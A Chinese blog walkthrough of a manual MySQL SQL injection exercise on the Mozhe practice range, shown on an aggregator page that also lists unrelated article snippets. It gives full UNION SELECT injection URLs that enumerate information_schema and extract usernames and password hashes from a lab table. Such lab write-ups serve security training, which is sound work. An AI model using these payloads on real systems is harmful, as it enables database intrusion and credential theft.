当前位置: 首页 > news >正文

sql手工注入漏洞测试(MYSQL)-墨者-url信息

news 2026/5/1 9:48:31

背景:

        自己在墨者官网靶场练习的时候,一直出错,手工容易出错,所以列举一些信息供大家核对,可以参考改动。

数据库版本version()              5.7.22-0ubuntu0.16.04.1
当前数据库名称database()        mozhe_Discuz_StormGroup
当前数据库用户user()             root@localhost
操作系统@@version_compile_os    Linux

信息:

一、猜列

124.70.22.208:45582/new_list.php?id=-1 order by $number

结果:1,2,3,4,只显示2,3

二、inmation_schema查表:

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

查询结果:StormGroup_member,notice

三、①StormGroup_member表中的列:

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

查询结果:id,name,password,status

四、②notice表中的列:

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='notice'

查询结果:id,title,content,time

分析:显然StormGroup_member表中的列更符合预期,查其中的数据

五、查name,password:

124.70.22.208:45582/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

查询结果,有两个name和对应的password。

总结:

        md5解密后只有一个name可以使用。手工注入较为繁琐,但能锻炼对漏洞的理解,读者们发现问题可私信交流。

相关文章:

sql手工注入漏洞测试(MYSQL)-墨者-url信息

背景: 自己在墨者官网靶场练习的时候,一直出错,手工容易出错,所以列举一些信息供大家核对,可以参考改动。 数据库版本version() 5.7.22-0ubuntu0.16.04.1 当前数据库名称database() m…...

编程日记 2023/11/23 7:24:49

52.seata分布式事务

目录 1.事务的四大特性。 2.分布式服务的事务问题。 3.seata。 3.1理论基础。 3.1.1CAP定理。 3.1.2BASE理论。 3.2初识Seata。 3.2.1Seata的架构。 3.2.2部署TC服务。 3.2.3微服务集成Seata。 3.3 seata提供的四种分布式事务解决方案。 3.3.1 XA模式。 3.3.1.1 X…...

编程日记 2023/11/23 7:23:48

HTML所有功能大汇总

HTML所有的功能&#xff0c;都在下面的表格中呈现清楚了。千万不要死记硬背&#xff0c;但是在遇到困难的时候&#xff0c;可以按照这个表进行查找。 类别功能HTML标签文本样式粗体<b></b> 或 <strong></strong>斜体<i></i>或<em>&…...

编程日记 2023/11/23 7:22:47

层次分析法--可以帮助你做决策的简单算法

作用 层次分析法是一个多指标的评价算法&#xff0c;主要用来在做决策时&#xff0c;给目标的多个影响因子做权重评分。特别是那些需要主观决策的、或者需要用经验判断的决策方案&#xff0c;例如&#xff1a; 买房子&#xff08;主观决策&#xff09;选择旅游地&#xff08;…...

编程日记 2023/11/23 7:21:46

docker启动链接sqlservr的镜像时报SSl错误

本次部署中遇到了老项目中的 net core 5.0 docker 镜像访问sql server 出现SSL Handshake failed with OpenSSL error - SSL_ERROR_SSL.问题 Microsoft.Data.SqlClient.SqlException (0x80131904): A connection was successfully established with the server, but then an e…...

编程日记 2023/11/23 7:20:45

力扣:175. 组合两个表(Python3)

题目&#xff1a; 表: Person ---------------------- | 列名 | 类型 | ---------------------- | PersonId | int | | FirstName | varchar | | LastName | varchar | ---------------------- personId 是该表的主键&#xff08;具有唯一值的列&#…...

编程日记 2023/11/23 7:19:44

【libGDX】使用Mesh绘制矩形

1 前言 使用Mesh绘制三角形 中介绍了绘制三角形的方法&#xff0c;本文将介绍绘制正方形的方法。 libGDX 以点、线段、三角形为图元&#xff0c;没有提供绘制矩形内部的接口。要绘制矩形内部&#xff0c;必须通过三角形拼接而成&#xff0c;如下图&#xff0c;是通过GL_TRIANGL…...

编程日记 2023/11/23 7:18:43

X2Keyarch迁移工具实战 | 将CentOS高效迁移至浪潮云峦操作系统KeyarchOS

X2Keyarch迁移工具实战 | 将CentOS高效迁移至浪潮云峦操作系统KeyarchOS 1. 搭建仿真线上业务环境2. 安装KeyarchOS操作系统和X2Keyarch迁移工具3. 将CentOS系统业务迁移至KeyarchOS系统 浪潮信息云峦操作系统KeyarchOS基于Linux Kernel、OpenAnolis等开源技术自主研发的一款服…...

编程日记 2023/11/23 7:17:41

基于VM虚拟机下Ubuntu18.04系统,Hadoop的安装与详细配置

参考博客&#xff1a; https://blog.csdn.net/duchenlong/article/details/114597944 与上面这个博客几乎差不多&#xff0c;就是java环境配置以及后面的hadoop的hdfs-site.xml文件有一些不同的地方。 准备工作 1.更新 # 更新 sudo apt update sudo apt upgrade2.关闭防火…...

编程日记 2023/11/23 7:16:40

【图像分类】基于深度学习的垃圾分类系统的设计与实现(ResNet网络,附代码和数据集)

写在前面: 首先感谢兄弟们的关注和订阅,让我有创作的动力,在创作过程我会尽最大能力,保证作品的质量,如果有问题,可以私信我,让我们携手共进,共创辉煌。(专栏订阅用户订阅专栏后免费提供数据集和源码一份,超级VIP用户不在服务范围之内,不想订阅专栏的兄弟们可以私信…...

编程日记 2023/11/23 7:15:38

MFS分布式文件系统

目录 集群部署 Master Servers ​Chunkservers ​编辑Clients Storage Classes LABEL mfs高可用 pacemaker高可用 ​编辑ISCSI 添加集群资源 主机 ip 角色 server1 192.168.81.11 Master Servers server2 192.168.81.12 Chunkservers server3 192.168.81.13 Chunkserver…...

编程日记 2023/11/23 7:14:37

Hadoop -hdfs的读写请求

1、HDFS写数据&#xff08;宏观&#xff09;&#xff1a; 1、首先&#xff0c;客户端发送一个写数据的请求&#xff0c;通过rpc与NN建立连接&#xff0c;NN会做一些简单的校验&#xff0c;文件是否存在&#xff0c;是否有空间存储数据等。 2、NN就会将校验的结果发送给客户端…...

编程日记 2023/11/23 7:13:36

【c++Leetcode】206. Reverse Linked List

问题入口 time complexity: O(n), space complexity:O(1) ListNode* reverseList(ListNode* head) {ListNode* prev nullptr;ListNode* curr head;while(curr){ListNode* forward curr->next;curr->next prev;prev curr;curr forward;}return prev; } time comp…...

编程日记 2023/11/23 7:12:36

[项目管理-33/创业之路-87/管理者与领导者-127]:如何提升自己项目管理的能力和水平

目录 前言&#xff1a; 一、项目经理的角色定位 1.1 项目经理的职责 1.2 不同矩阵类型的项目&#xff0c;项目经理的职责 1.3 项目经理的角色定位 1.4 项目经理的发展路径 二、项目经理项目理论和知识结构 三、软件项目经理在计算机水平的提升 四、项目经理业务知识的…...

编程日记 2023/11/23 7:11:35

记录一次因内存不足而导致hiveserver2和namenode进程宕机的排查

背景 最近发现集群主节点总有进程宕机&#xff0c;定位了大半天才找到原因&#xff0c;分享一下 排查过程 查询hiveserver2和namenode日志&#xff0c;都是正常的&#xff0c;突然日志就不记录了&#xff0c;直到我重启之后又恢复工作了。 排查各种日志都是正常的&#xff0…...

编程日记 2023/11/23 7:10:33

c# 基础语法

c# 程序结构 using System.Collections.Generic; namespace demo1; //一个命名空间可以包含多个类 using System.IO; using System.Drawing;class proj {/// <summary>/// c#是微软开发的&#xff0c;基于c和c的一种面象对象编程语言&#xff0c;用于快速开发windows桌…...

编程日记 2023/11/23 7:09:32

【译】什么时候使用 Spring 6 JdbcClient

原文地址&#xff1a;Spring 6 JdbcClient: When and How to Use it? 一、前言 自 Spring 6.1 起&#xff0c;JdbcClient 为 JDBC 查询和更新操作提供了统一的客户端 API&#xff0c;从而提供了更流畅、更简化的交互模型。本教程演示了如何在各种场景中使用 JdbcClient。 二…...

编程日记 2023/11/23 7:08:31

VR全景:赋能城市园区建设,打造3DVR城市名片

近年来&#xff0c;很多城市都在大力发展数字化经济建设&#xff0c;以VR全景技术赋能现代化城市和园区建设&#xff0c;为城市园区展示带来了全新的可能性。借助3D、VR技术把现实城市和园区搬到互联网上进行全方位展示&#xff0c;将城市园区的形象、景观、规划布局等1&#x…...

编程日记 2023/11/23 7:07:30

孟德尔随机化写作技巧mr

...

编程日记 2023/11/23 7:05:28

社会媒体营销提问常用的ChatGPT通用提示词模板

如何制定有效的社会媒体营销策略&#xff1f; 如何选择适合的社会媒体平台进行营销&#xff1f; 如何创造有吸引力的社会媒体内容&#xff0c;提高用户参与度和分享率&#xff1f; 如何运用社交媒体广告来增加品牌曝光和用户转化&#xff1f; 如何建立和维护社交媒体账号和…...

编程日记 2023/11/23 7:04:27

Gemini 在线免登录直接使用(2026 入口)

&#xff08;t.877ai.cn&#xff09;这类 AI 工具平台推荐 / AI 模型聚合平台&#xff0c;正好能满足很多用户“先试用、再决定”的需求。如果你最近在找 Gemini 在线免登录直接使用的入口&#xff0c;先说结论&#xff1a;这类需求本质上不是“找一个神秘地址”&#xff0c;而…...

编程新知 2026/5/1 8:54:38

Radiology(IF=15.2)法国居里研究所等团队:治疗后MRI预测三阴性乳腺癌对新辅助化疗免疫治疗的病理完全缓解

01文献学习今天分享的文献是由法国居里研究所等团队于2025年7月在《Radiology》&#xff08;中科院1区top&#xff0c;IF15.2&#xff09;上发表的研究“Posttreatment MRI to Predict Pathologic Complete Response of Triple-Negative Breast Cancer to Neoadjuvant Chemoimm…...

编程新知 2026/5/1 6:43:59

“十五五”气象发展规划:聚焦五大核心任务

一、总体目标 到2030年&#xff0c;我国气象领域力争在关键科技领域取得重要突破&#xff0c;气象科技、预报、监测达到同期世界先进水平&#xff0c;极端天气应对能力显著提升&#xff0c;气象服务实现世界领先&#xff0c;我国成为全球气象治理重要力量。 二、五大核心任务…...

编程新知 2026/5/1 6:21:16

别再死磕RPN了!用AI辅助工具快速上手DFMEA的AP(行动优先级)实战

别再死磕RPN了&#xff01;用AI辅助工具快速上手DFMEA的AP&#xff08;行动优先级&#xff09;实战 在汽车和医疗器械行业&#xff0c;设计失效模式与影响分析&#xff08;DFMEA&#xff09;是确保产品可靠性的核心工具。然而&#xff0c;许多工程师和质量经理仍在使用传统的风…...

编程新知 2026/5/1 5:57:32

INTERPUF框架:芯片互连层的低功耗安全认证技术

1. INTERPUF框架概述在异构计算时代&#xff0c;芯片级安全认证面临前所未有的挑战。传统基于软件加密的方案存在密钥存储风险&#xff0c;而硬件安全模块又面临面积和功耗的制约。INTERPUF创新性地将物理不可克隆函数(PUF)嵌入芯片互连层&#xff0c;构建了一个兼具低功耗和高…...

编程新知 2026/5/1 5:32:40

project_travel_advisor高级功能实现:地理位置、数据筛选和响应式设计

project_travel_advisor高级功能实现&#xff1a;地理位置、数据筛选和响应式设计 【免费下载链接】project_travel_advisor Tutorial created in collaboration with Enyel Sequeira, taught by JavaScript Mastery. 项目地址: https://gitcode.com/gh_mirrors/pr/project_t…...

编程新知 2026/5/1 4:53:06

工业R语言预测模型过不了产线验收?这7项ISO 13374-3合规性验证要点必须闭环

更多请点击&#xff1a; https://intelliparadigm.com 第一章&#xff1a;工业R语言设备剩余寿命预测的ISO 13374-3合规性挑战本质 ISO/IEC 13374-3:2016 定义了状态监测与诊断系统中“数据处理与分析”模块的架构要求&#xff0c;强调算法可追溯性、输入输出语义一致性及不确…...

编程新知 2026/5/1 4:39:56

ARM SIMD指令SHLL与SHRN详解及应用优化

1. ARM SIMD指令概述在ARM架构中&#xff0c;SIMD&#xff08;Single Instruction Multiple Data&#xff09;技术通过单条指令同时处理多个数据元素&#xff0c;显著提升了多媒体处理、信号处理等数据并行任务的执行效率。AdvSIMD作为ARM的SIMD指令集扩展&#xff0c;提供了丰…...

编程新知 2026/5/1 3:35:47

LED驱动电路热管理:CCR散热设计与PCB选型实践

1. LED驱动中的热管理挑战在LED驱动电路设计中&#xff0c;恒流调节器(CCR)的热管理是决定系统可靠性的关键因素。作为一名从事LED驱动设计多年的工程师&#xff0c;我见过太多因为热设计不当导致的系统失效案例。CCR器件在工作时会产生显著的热量&#xff0c;这些热量如果不能…...

编程新知 2026/5/1 1:26:07

Johny_Zhao

基础示例&#xff1a;单工作表 Excel 转 TXT 以下是将一个 Excel 文件中的第一个工作表转换为 TXT 的完整步骤&#xff1a; 1. 加载并读取Excel文件 from spire.xls import * from spire.xls.common import * workbook Workbook() workbook.LoadFromFile("示例.xlsx"…...

编程新知 2026/5/1 0:40:54